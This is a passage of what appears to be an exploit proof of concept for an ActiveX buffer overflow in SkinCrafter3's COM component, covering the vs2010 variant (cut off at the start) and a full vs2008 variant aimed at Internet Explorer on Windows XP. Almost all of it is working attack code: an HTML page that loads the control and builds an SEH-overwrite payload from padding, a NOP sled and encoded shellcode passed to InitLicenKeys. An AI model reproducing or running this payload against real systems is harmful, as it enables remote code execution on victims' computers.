"\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39"+
"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46"+
"\x4e\x46\x43\x36\x42\x50\x5a");
junk2 = "";
while(junk2.length < 7948) junk2+="D";
payload = junk1 + nseh + seh + nops+ shellcode + junk2;
arg1=payload;
arg1=arg1;
arg2="SkinCrafter3_vs2010";
arg3="SkinCrafter3_vs2010";
arg4="SkinCrafter3_vs2010";
target.InitLicenKeys(arg1 ,arg2 ,arg3 ,arg4 );
</script>
</html>
################################################################################
<html>
<br>ActiveX Buffer Overflow in SkinCrafter3_vs2008 </br>
<br>Affected version=3.8.1.0</br>
<br>Vendor Homepage:http://skincrafter.com/</br>
<br>Software Link:skincrafter.com/downloads/SkinCrafter_Demo_2005_2008_x86.zip</br>
<br>The vulnerability lies in the COM component used by the product SkinCrafter3_vs2008.dll.</br>
<br>Description: Skin Crafter is a software that is used to create custom skins for different windows applications.</br>
<br>SkinCrafter is compatible with Windows XP / Vista / 7 / 8 and earlier versions.</br>
<br>Vulnerability tested on Windows Xp Sp3 (EN),with IE6</br>
<br>Author: metacom</br>
<br>Vulnerability discovered:04.01.2015</br>
<!--
POC Video:http://bit.ly/1yopgU3
twitter.com/m3tac0m
-->
<object classid='clsid:F12724A5-84D6-4D74-902B-4C0C25A11C86' id='target' ></object>
<script >
junk1 = "";
while(junk1.length < 2040) junk1+="A";
nseh = "\xeb\x06\x90\x90";
seh = "\x37\x1E\x01\x10";
nops= "";
while(nops.length < 50) nops+="\x90";
shellcode =(
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"+
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"+
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"+
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"+
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"+
"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47"+
"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38"+
"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48"+
"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c"+
"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"+
"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58"+
"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44"+
"\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38"+
"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33"+
"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47"+
"\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a"+
"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b"+
"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53"+
"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57"+
"\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39"+
"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46"+
"\x4e\x46\x43\x36\x42\x50\x5a");
junk2 = "";
while(junk2.length < 7960) junk2+="D";
payload = junk1 + nseh + seh + nops+ shellcode + junk2;
arg1=payload;
arg1=arg1;
arg2="SkinCrafter3_vs2008";
arg3="SkinCrafter3_vs2008";
arg4="SkinCrafter3_vs2008";
target.InitLicenKeys(arg1 ,arg2 ,arg3 ,arg4 );
</script>
</html>